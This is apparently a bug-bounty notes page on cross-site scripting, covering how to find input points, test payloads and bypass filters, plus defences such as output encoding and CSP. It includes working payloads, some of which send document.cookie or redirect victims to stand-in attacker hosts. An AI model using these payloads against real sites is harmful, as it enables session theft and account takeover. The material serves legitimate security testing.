XSS
Last updated
Was this helpful?
Last updated
Was this helpful?
Cross-site scripting works by manipulating a vulnerable web site so that it returns malicious JavaScript to users. When the malicious code executes inside a victim's browser, the attacker can fully compromise their interaction with the application.
There are three Main kinds of XSS: The difference between these types is in how the XSS payload travels before it gets delivered to the victim user.
, where the malicious script comes from the current HTTP request.
, where the malicious script comes from the website's database.
, where the vulnerability exists in client-side code rather than server-side code.
Step 1: Look for Input Opportunities
look for opportunities to submit user input(comment, user profiles, blog posts, forms, search, and name and username fields in sign-ups)
even the drop down menus and numeric values are chances (u can edit the value in Burp)
for reflected and DOM (URL parameters, fragments #
, or pathnames that get displayed back)
Step 2: Insert Payloads
Inject different payloads like event handlers<img src=x onerror=alert('Hunter')>
Try different URL scheme javascript:alert
, data:text/html,<script>alert('XSS by Vickie')</script>
Try encoding
check for user to load an image by using a URL and use it as their profile picture: https://example.com/upload_profile_pic?url=IMAGE_URL
Take a look at the [XSS cheatsheet]() from PortsWigger.
Browser use different tags and event handlers, so test by using different browsers
Close out previous HTML tags <img src=""/><script>location="http://attacker.com";</script>">
inject special chars and STUDY the response >'<"//:=;!--
use XSS hunter for blind XSS
search for input fields like comments and URL params
Fuzz parameter using Arjun and param-miner to get hidden params
inject special chars and STUDY the response >'<"//:=;!--
and make payload from the ones that worked and didn't get escaped or encoded
Can you inject into non-changing values (e.g. usernames)?
the app escaping or deleting the <Script>
tags?
Try event handlers
Try URL scheme javascript:alert
, `data:text/html,alert('Hunter')
Use Recursive tags <scrip<script>t>location='http://attacker_server_ip/c='+document.cookie;</scrip</script>t>
Try capitalization and encoding
Try eval() function
the App filters the special chars like the single and double quotes?
Use the fromCharCode function <scrIPT>location=String.fromCharCode(104 116 116 112 58 47 47 72 117 110 116 101 114 47 63 99 61)+document.cookie;
to map the ascii to string
Try HTTP Parameter Pollution
Filter input on arrival
Encode data on output: encode the output to prevent it from being interpreted as active content
use the Content-Type
and X-Content-Type-Options
headers to ensure that browsers interpret the responses in the way you intend.
Use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur
escaping especial chars
use HTML entities function
sanitize and validate every user input
Steal CSRF Token of the user and send it to your server as a parameter in the logs
automatically redirect the victim to malicious pages and perform other harmful operations such as installing malware
make sure to assess the full impact of that particular XSS to include in your vulnerability report.
Look for user input opportunities on the application
Insert XSS payloads into the user input fields you’ve found. Insert payloads from lists online, a polyglot payload, or a generic test string
Confirm the impact of the payload by checking whether your browser runs your JavaScript code. Or in the case of a blind XSS, see if you can make the victim browser generate a request to your server.
If you can’t get any payloads to execute, try bypassing XSS protections.
Automate the XSS hunting process
Consider the impact of the XSS you’ve found: who does it target? How many users can it affect? And what can you achieve with it? Can you escalate the attack by using what you’ve found?
look at | |
For more detailed guides look at |
If the program you are targeting allows automatic testing, you can use Burp intruder or other fuzzers like wfuzz or FFUF to conduct an automatic XSS scan on your target, u can find many payloads for that here |
Recommended Writeup: